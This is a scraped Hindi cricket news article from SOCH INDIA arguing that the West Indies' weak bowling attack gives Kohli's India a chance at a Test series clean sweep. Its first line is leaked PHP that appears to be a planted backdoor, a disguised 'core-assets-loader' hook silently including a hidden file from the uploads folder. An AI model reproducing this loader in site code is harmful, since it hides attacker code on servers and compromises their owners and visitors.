add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); वेस्ट इंडीज ने किया कमजोर टीम का ऐलान, विराट एंड कंपनी के पास क्लीन स्वीप का मौका! – SOCH INDIA
Menu

खेल
वेस्ट इंडीज ने किया कमजोर टीम का ऐलान, विराट एंड कंपनी के पास क्लीन स्वीप का मौका!

nobanner

भारत के खिलाफ पहले टेस्ट के लिए वेस्ट इंडीज की टीम घोषित हो चुकी है लेकिन इस टीम से डरने की बजाए कोहली खुश होंगे, क्योंकि अब उनके पास वेस्टइंडीज में वो करने का मौका है जिसके बारे में किसी भारतीय कप्तान ने कभी सोचा भी नहीं होगा।

शैनन ग्रैबिएल (इकलौते विशेषज्ञ तेज गेंदबाज), देवेंद्र बिशू (इकलौते स्पिनर),जेसन होल्डर (ऑलराउंडर), कार्लोस ब्रेथवेट (ऑलराउंडर) ये है वेस्टइंडीज टीम का गेंदबाजी आक्रमण जो टीम इंडिया की बेहद मजबूत बैटिंग लाइन अप के खिलाफ 20 विकेट लेने के इरादे से मैदान में उतरेगा। शायद विराट कोहली और उनके साथी बल्लेबाजों के लिए सीरीज से पहले इससे सुखद खबर कुछ और नहीं हो सकती थी।

वेस्ट इंडीज ने किया कमजोर टीम का ऐलान, विराट एंड कंपनी के पास क्लीन स्वीप का मौका!
भारत के खिलाफ पहले टेस्ट के लिए वेस्ट इंडीज की टीम घोषित हो चुकी है लेकिन इस टीम से डरने की बजाए कोहली खुश होंगे, क्योंकि अब उनके पास वेस्टइंडीज में वो करने का मौका है जिसके बारे में किसी भारतीय कप्तान ने कभी सोचा भी नहीं होगा।

जहां कोहली की रणनीति हर हाल में 5 गेंदबाज लेकर 20 विकेट झटकने की है वहीं मेहमान टीम सिर्फ 2 फुल टाइम गेंदबाज लेकर उतर रही है जिससे ये साफ है कि वो जीत की बजाए ड्रॉ को ही बेहतर नतीजा मान कर चल रहे हैं। अगर कैरेबियाई गेंदबाजी आक्रमण के कुल अनुभव को जोड़ें तो अकेले ईशांत शर्मा ही इन पर भारी पड़ेंगे।

एक जमाना था जब वेस्टइंडीज की टीम को उनके खूंखार तेज गेंदबाजों की चौकड़ी के लिए जाना जाता था। विरोधी दौरा करने से पहले डर कर कांपने लगते थे और आज आलम ये है कि उसी कैरेबियाई टीम के पास 4 मैच विनर गेंदबाज तक नहीं जुट पा रहे हैं। ऐसे में कोहली के पास ना सिर्फ सीरीज जीतने का बल्कि क्लीन स्वीप करने का अदभुत मौका है। एक ऐसा मौका जो विरले कप्तानों को ही मिला है।

पिछले 6 दशक में भारत ने वेस्टइंडीज में सिर्फ 5 टेस्ट जीते हैं लेकिन इस दौरे पर भारत को 4 मैच जीतने का सुनहरा मौका है। कागज पर इतनी मामूली दिखने वाली वेस्टइंडीज टीम के खिलाफ विराट एंड कंपनी क्लीन स्वीप को इस सुनहरे मौके को बिल्कुल गंवाना नहीं चाहेगी और टीम इंडिया अगर पूरी क्षमता के साथ वार करती है तो वेस्टइंडीज में अबकी बार चमत्कार की पूरी गारंटी है।